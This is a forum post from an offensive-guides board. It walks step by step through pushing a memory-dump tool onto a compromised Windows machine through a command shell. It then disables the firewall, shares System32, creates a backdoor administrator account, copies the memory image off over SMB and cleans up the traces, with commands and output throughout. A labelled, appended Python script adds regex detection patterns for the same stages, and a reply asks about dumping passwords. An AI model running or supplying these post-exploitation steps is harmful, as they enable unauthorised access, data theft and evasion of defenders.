Offensive Guides & Information
#1
17th March 2009, 18:13
MaXe
Dumping Memory thru Command Shell

[Thanks to DarkOperator for this Article]

Since in my last post I covered how to do this in meterpreter with the
script I wrote, I decided to show how to do the same from command shell
and you will see why I love Meterpreter and scripting Meterpreter so much!!


We start by downloading mdd into our Backtrack4 machine.
Quote:
root@bt:/pentest/windows-binaries# wget http://voxel.dl.sourceforge.net/sour...dd/mdd_1.3.exe
--2009-03-10 14:01:49-- http://voxel.dl.sourceforge.net/sour...dd/mdd_1.3.exe
Resolving voxel.dl.sourceforge.net... 72.26.194.82
Connecting to voxel.dl.sourceforge.net|72.26.194.82|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 95104 (93K) [application/octet-stream]
Saving to: `mdd_1.3.exe'
100%[==================================================================>] 95,104 175K/s in 0.5s
2009-03-10 14:01:49 (175 KB/s) - `mdd_1.3.exe' saved [95104/95104]
We will be using exe2bat.exe, which is available in /pentest/windows-binaries/tools. To be able to use this tool the executable has to be 64k or less due to the limitations of the Windows debug command. When we check the size of the executable we can see that it is 93k in size.
Quote:
root@bt:/pentest/windows-binaries# ls -lh mdd*
-rw-r--r-- 1 root root 93K 2009-01-27 12:48 mdd_1.3.exe
We can compress the executable with UPX so as to be able to meet the 64k requirement; in Backtrack4 it will have to be installed using apt-get.
Quote:
root@bt:/pentest/windows-binaries# upx -2 -o mdd.exe mdd_1.3.exe
Ultimate Packer for eXecutables
Copyright (C) 1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007
UPX 3.01 Markus Oberhumer, Laszlo Molnar & John Reiser Jul 31st 2007

File size Ratio Format Name
-------------------- ------ ----------- -----------
95104 -> 55168 58.01% win32/pe mdd.exe

Packed 1 file.
As you can see the executable is now 55k in size. In Backtrack 4 we use wine to run the exe2bat.exe executable to convert the exe into a batch file that we can paste in the shell, which will use debug to generate our executable on the target host.
Quote:
root@bt:/pentest/windows-binaries/tools# wine exe2bat.exe ../mdd.exe mdd.txt
Finished: ../mdd.exe > mdd.txt
We take the content of mdd.txt and paste it into our command shell. You will see that you might get an error on the last line pasted; this is expected.
Quote:
c:\Windows\System32>copy 1.dll ../mdd.exe
The syntax of the command is incorrect.
The problem was the case of the dll name (first time I have ever noticed that copy is case sensitive).
Quote:
c:\Windows\System32>copy 1.dll ../mdd.exe
The syntax of the command is incorrect.

c:\Windows\System32>copy 1.DLL mdd.exe
1 file(s) copied.

c:\Windows\System32>mdd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.
-> ERROR: must specify output filename; use -h for usage

c:\Windows\System32>
We can perform a check of the size of the physical memory on the target host with systeminfo; this will give us an estimate of the image file that will be generated.
Quote:
c:\Windows\System32>systeminfo | find /i "physical"
Total Physical Memory: 3,070 MB
Available Physical Memory: 859 MB
Now that mdd is on the target machine we can make an image of the memory and dump it locally.
Quote:
c:\Windows\System32>mdd.exe -o memimg.dd
-> mdd
-> ManTech Physical Memory Dump Utility
Copyright (C) 2008 ManTech Security & Mission Assurance
-> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
This is free software, and you are welcome to redistribute it
under certain conditions; use option `-c' for details.
-> Dumping 3070.34 MB of physical memory to file 'memimg.dd'.
773770 map operations succeeded (0.98)
12236 map operations failed
took 137 seconds to write
MD5 is: 888b9663c5d760f36f5b948ed92bef23
Once the image has been made we can use several methods to transfer the image to our target machine: this may be by tftp, scripting ftp, mounting a share from our machine that we configured with samba, or we can even create a share of our own and connect to it. I will demonstrate the task of creating a share since it might be the most useful when working in large teams against a single target host, and most of the steps can be of use to others in different scenarios. We can share the folder and disable the local built-in firewall to be able to gain access to the share.
Quote:
c:\Windows\System32>net share img=c:\windows\system32
img was shared successfully.

c:\Windows\System32>netsh.exe firewall set opmode disable
Ok.
Before we create an account we can check the Account Security Policy settings so as to save time by not doing trial and error on password length while creating our account for access.
Quote:
c:\Windows\System32>net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 455
Minimum password length: 12
Length of password history maintained: 6
Lockout threshold: 10
Lockout duration (minutes): 60
Lockout observation window (minutes): 5
Computer role: WORKSTATION
The command completed successfully.
Now that we know the password length we can create an account and add it to the local Administrators group; we will use this account to mount the share we created.
Quote:
c:\Windows\System32>net user /add SUPPORT_3089 P@ssword0001
The command completed successfully.

c:\Windows\System32>net localgroup Administrators /add SUPPORT_3089
The command completed successfully.
Next we mount the share on our machine with the smbmount command and the credential of the user we created.
Quote:
root@bt:/pentest/windows-binaries/tools# smbmount //192.168.1.192/img /mnt/img -o user=SUPPORT_3089,pass=P@ssword0001
Now that we have mounted the share we can copy over the file; to anyone looking, this will look like a normal file transfer. As you can see, the image size is 3GB.
Quote:
root@bt:/mnt/img# ls -lh memimg.dd
-rwxrwSrwx 1 root root 3.0G 2009-03-10 14:50 memimg.dd
Once we have copied over the image we must perform clean up of everything we did on the target host.
Quote:
c:\Windows\System32>del memimg.dd

c:\Windows\System32>del mdd.exe

c:\Windows\System32>net share /del img
img was deleted successfully.

c:\Windows\System32>net user /del SUPPORT_3089
The command completed successfully.

c:\Windows\System32>netsh firewall set opmode enable
Ok.
I hope you have found this post of great use and please do share opinions and ideas.
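From the defender's side, every step of the walkthrough above leaves a process-creation trace (the debug-based file drop, the share on System32, the firewall being switched off, the new local administrator, and the mdd invocation). The following correlation script is an added example, not part of the original post or of mdd/exe2bat: it scores constructed process-creation events per host and reports hosts where several of those stages occur close together. The stage names, the regexes, the sample events and the assumption that an exe2bat drop shows up as a "debug<" redirect are all illustrative.

```python
import re
from collections import defaultdict

# One regex per stage of the procedure in the post above. The patterns are
# illustrative assumptions (not product signatures); the "debug<" redirect is
# how an exe2bat-style drop is assumed to appear on the command line.
STAGES = {
    "debug_drop":    re.compile(r"\bdebug(\.exe)?\s*<", re.I),
    "dll_to_exe":    re.compile(r"\bcopy\s+\S+\.dll\s+\S+\.exe\b", re.I),
    "firewall_off":  re.compile(r"\bnetsh(\.exe)?\s+firewall\s+set\s+opmode\s+disable\b", re.I),
    "share_created": re.compile(r"\bnet(\.exe)?\s+share\s+\w+=", re.I),
    "user_added":    re.compile(r"\bnet(\.exe)?\s+user\s+/add\b", re.I),
    "admin_added":   re.compile(r"\bnet(\.exe)?\s+localgroup\s+administrators\s+/add\b", re.I),
    "memory_dump":   re.compile(r"\bmdd(\.exe)?\b.*\s-o\s+\S+", re.I),
}

def classify(cmdline):
    """Return the names of every stage whose pattern matches one command line."""
    return [name for name, rx in STAGES.items() if rx.search(cmdline)]

def correlate(events, window=1800, min_stages=3):
    """events: iterable of (timestamp_seconds, host, command_line).
    Returns {host: sorted stage names} for each host on which at least
    min_stages distinct stages occur within `window` seconds of one another."""
    hits_by_host = defaultdict(list)
    for ts, host, cmd in events:
        for stage in classify(cmd):
            hits_by_host[host].append((ts, stage))
    findings = {}
    for host, hits in hits_by_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):           # slide a window from each hit
            seen = {stage for ts, stage in hits[i:] if ts - t0 <= window}
            if len(seen) >= min_stages:
                findings[host] = sorted(seen)
                break
    return findings

# Constructed sample process-creation events (timestamp, host, command line):
SAMPLE_EVENTS = [
    (0,   "WS01", "notepad.exe C:\\Users\\alice\\notes.txt"),
    (60,  "WS02", "cmd.exe /c debug<1.hex"),
    (65,  "WS02", "copy 1.DLL mdd.exe"),
    (120, "WS02", "mdd.exe -o memimg.dd"),
    (400, "WS02", "net share img=c:\\windows\\system32"),
    (405, "WS02", "netsh.exe firewall set opmode disable"),
    (500, "WS02", "net user /add SUPPORT_3089 P@ssword0001"),
    (505, "WS02", "net localgroup Administrators /add SUPPORT_3089"),
    (900, "WS03", "net user /add helpdesk Pass1234"),  # a single stage alone: no finding
]
```

Run `correlate(SAMPLE_EVENTS)` to see WS02 flagged with all seven stages while WS03, which only adds a user, is not; the firewall-disable and share-on-System32 stages are worth alerting on even in isolation.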
#2
31st March 2009, 03:29
fox33
Re: Dumping Memory thru Command Shell

With this article, can I dump passwords from memory?
Thanks
Copyright ©2007 - Forever, InterN0T & Teh Unkwon